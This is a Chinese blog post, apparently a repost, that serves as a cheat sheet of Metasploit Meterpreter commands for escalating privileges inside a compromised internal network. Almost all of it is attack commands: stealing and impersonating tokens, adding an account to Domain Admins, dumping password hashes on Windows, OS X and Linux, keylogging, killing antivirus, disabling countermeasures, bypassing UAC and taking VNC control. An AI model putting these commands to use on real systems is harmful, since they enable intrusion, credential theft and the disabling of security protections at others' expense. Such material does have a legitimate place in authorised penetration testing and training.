【干货】Metasploit 进一步提升内网权限

其他 2020-03-27 10:29:04 阅读次数: 0

提权一般步骤

meterpreter> use priv
meterpreter> getsystem
meterpreter> ps
meterpreter> steal_token 1784
meterpreter> shell
net user msf msf /add /DOMAIN
net group "Domain Admins" msf /add /DOMAIN

获取hash 一般步骤

meterpreter> use priv
meterpreter> getsystem
meterpreter> hashdump

如果是在win2008 系统上:

meterpreter> run migrate
meterpreter> run killav
meterpreter> ps
meterpreter> migrate 1436
meterpreter> keyscan_start
meterpreter> keyscan_dump
meterpreter> keyscan_stop

使用Incognito 提权

meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> use priv
meterpreter> getsystem
meterpreter> list_tokens -u
meterpreter> impersonate_token IHAZSECURITY\\Administrator

查看保护机制并禁用之

meterpreter> run getcountermeasure
meterpreter> run getcountermeasure -h
meterpreter> run getcountermeasure -d -k

检查是否是虚拟机

meterpreter> run checkvm

转入命令行

meterpreter> shell

远程VNC 控制

meterpreter> run vnc

转入后台

meterpreter> background

Bypass UAC

meterpreter> run post/windows/escalate/bypassuac

OS X 系统上dump hash

meterpreter> run post/osx/gather/hashdump

Linux 系统上dump hash

meterpreter> run post/linux/gather/hashdump
IceCliffs
发布了23 篇原创文章 · 获赞 19 · 访问量 1万+
私信 关注

猜你喜欢

转载自blog.csdn.net/weixin_42608762/article/details/104766902
今日推荐
富文本编辑器 Quill 2.0 重磅发布,特性、可靠性与开发者体验大幅提升
“开源信徒”周鸿祎开源360智脑大模型
周排行
Ubuntu 14.04 下Fuel6.0安装部署
香港一小巴侧翻致1死16伤 警方:未见机件故障
pikachu--XSS盲打
阅读 深入理解JVM虚拟机笔记一
java.sql.SQLException: ORA-00932: 数据类型不一致: 应为 -, 但却获得 CLOB
oracle delete all object under an user
[LeetCode]20 Valid Parentheses 有效的括号
树形DP求树的直径 【模板】
Context propagation over HTTP in Go
【PAT】(B)1053 住房空置率 (20)*
每日归档
更多
2024-04-18(0)
2024-04-17(5)
2024-04-16(70)
2024-04-15(42)
2024-04-14(0)
2024-04-13(119)
2024-04-12(38)
2024-04-11(14)
2024-04-10(68)
2024-04-09(5)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022